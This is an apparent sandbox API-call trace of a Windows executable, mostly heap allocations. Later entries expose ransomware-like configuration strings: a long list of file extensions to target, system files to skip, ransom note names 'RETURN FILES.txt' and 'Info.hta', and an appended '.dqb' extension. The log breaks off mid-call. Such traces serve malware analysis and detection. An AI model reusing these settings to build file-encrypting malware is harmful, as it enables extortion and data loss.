Size=0xa) returned 0x5a9c40 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9c58 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9c70 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9c88 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9ca0 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9cb8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9cd0 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9ce8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9d00 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9d18 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9d30 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9d48 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9d60 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9d78 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9d90 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a52e8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9da8 [0031.052] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9dc0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9dd8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a9fc8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9df0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9e08 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9e20 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9e38 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9e50 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9e68 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9e80 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9e98 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9eb0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9ec8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9ee0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9ef8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9f10 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5a9f28 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9f40 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9f58 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9f70 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5a9f88 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc468 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc480 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc498 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a9fd8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5a9fe8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc4b0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc4c8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc4e0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc4f8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc510 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bc528 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc540 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc558 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc570 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc588 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bc5a0 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc5b8 [0031.053] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc5d0 [0031.053] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x400) returned 0x5a9198 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc5e8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc600 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bc618 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc630 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc648 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc660 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bc678 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc690 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc6a8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc6c0 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5a9ff8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc6d8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bc6f0 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc708 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc720 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc738 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc750 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5bc768 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc780 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc798 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc7b0 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc7c8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc7e0 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc7f8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc810 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc828 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5aa008 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc868 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc880 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc898 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc8b0 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc8c8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc8e0 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc8f8 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc910 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc928 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5bc940 [0031.054] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc958 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5bc970 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc988 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc9a0 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc9b8 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc9d0 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bc9e8 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bca00 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bca18 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bca30 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bca48 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bca60 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bca78 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bca90 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcaa8 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcac0 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcad8 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcaf0 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb08 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb20 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb38 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb50 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb68 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb80 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcb98 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5bcbb0 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12) returned 0x5a5f00 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcbc8 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcbe0 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcbf8 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcc10 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcc28 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcc68 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcc80 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcc98 [0031.055] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bccb0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bccc8 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcce0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bccf8 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcd10 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcd28 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcd40 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcd58 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcd70 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcd88 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcda0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcdb8 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcdd0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcde8 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bce00 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe) returned 0x5bce18 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bce30 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5aa018 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bce48 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5aa028 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bce60 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bce78 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bce90 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcea8 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcec0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bced8 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcef0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcf08 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcf20 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcf38 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcf50 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcf68 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5bcf80 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcf98 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x5aa038 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcfb0 [0031.056] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa) returned 0x5bcfc8 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a9198, Size=0x800) returned 0x5bd450 [0031.057] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0031.057] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb448 | out: hHeap=0x570000) returned 1 [0031.057] lstrlenW (lpString="") returned 0 [0031.057] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdd90 | out: hHeap=0x570000) returned 1 [0031.057] lstrlenW (lpString=".dqb") returned 4 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584750, Size=0x8) returned 0x584750 [0031.057] lstrlenW (lpString=".dqb") returned 4 [0031.057] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdd90 | out: hHeap=0x570000) returned 1 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bddc0, Size=0x20) returned 0x584370 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584370, Size=0x40) returned 0x5a6a80 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6a80, Size=0x80) returned 0x5cb450 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0a8, Size=0x8) returned 0x5aa0b8 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0b8, Size=0x10) returned 0x5bddc0 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bddc0, Size=0x20) returned 0x584348 [0031.057] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0031.057] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb450 | out: hHeap=0x570000) returned 1 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bddf0, Size=0x20) returned 0x5a5930 [0031.057] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5930, Size=0x40) returned 0x5a6a80 [0031.057] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.058] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a6a80 | out: hHeap=0x570000) returned 1 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bddf0, Size=0x20) returned 0x5a5930 [0031.058] lstrlenW (lpString="Info.hta") returned 8 [0031.058] lstrlenW (lpString="Info.hta") returned 8 [0031.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0031.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5dd440, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe")) returned 0x30 [0031.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd440 | out: hHeap=0x570000) returned 1 [0031.058] lstrlenW (lpString="ivttvf.exe") returned 10 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584348, Size=0x40) returned 0x5a6a80 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bddf0, Size=0x20) returned 0x584348 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bddf0, Size=0x20) returned 0x5a5930 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5930, Size=0x40) returned 0x5a6ac8 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6ac8, Size=0x80) returned 0x5cb450 [0031.058] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5bb448 [0031.058] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb448 | out: hHeap=0x570000) returned 1 [0031.058] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x5dd440, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0031.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ed448 | out: hHeap=0x570000) returned 1 [0031.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd440 | out: hHeap=0x570000) returned 1 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0b8, Size=0x8) returned 0x5aa0a8 [0031.059] lstrlenW (lpString="%windir%;") returned 9 [0031.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584348 | out: hHeap=0x570000) returned 1 [0031.059] lstrlenW (lpString="C:\\Windows;") returned 11 [0031.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cd438 | out: hHeap=0x570000) returned 1 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bde08, Size=0x20) returned 0x584348 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584348, Size=0x40) returned 0x5a6ac8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6ac8, Size=0x80) returned 0x5cb450 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5bb448 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0e8, Size=0x8) returned 0x5aa0f8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0f8, Size=0x10) returned 0x5bde50 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bde50, Size=0x20) returned 0x584348 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0b8, Size=0x8) returned 0x5aa0f8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0c8, Size=0x8) returned 0x5aa0b8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0e8, Size=0x8) returned 0x5aa108 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa108, Size=0x10) returned 0x5bdef8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bdef8, Size=0x20) returned 0x5a5930 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0f8, Size=0x10) returned 0x5bdef8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0b8, Size=0x10) returned 0x5bdf28 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa0f8, Size=0x8) returned 0x5aa0e8 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa118, Size=0x8) returned 0x5aa128 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bdef8, Size=0x20) returned 0x5a58e0 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bdf28, Size=0x20) returned 0x5a5840 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa138, Size=0x8) returned 0x5aa148 [0031.059] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb448 | out: hHeap=0x570000) returned 1 [0031.059] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bdfa0, Size=0x20) returned 0x5a5958 [0031.059] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x5cd438, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0031.059] lstrlenW (lpString="C:\\") returned 3 [0031.060] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, 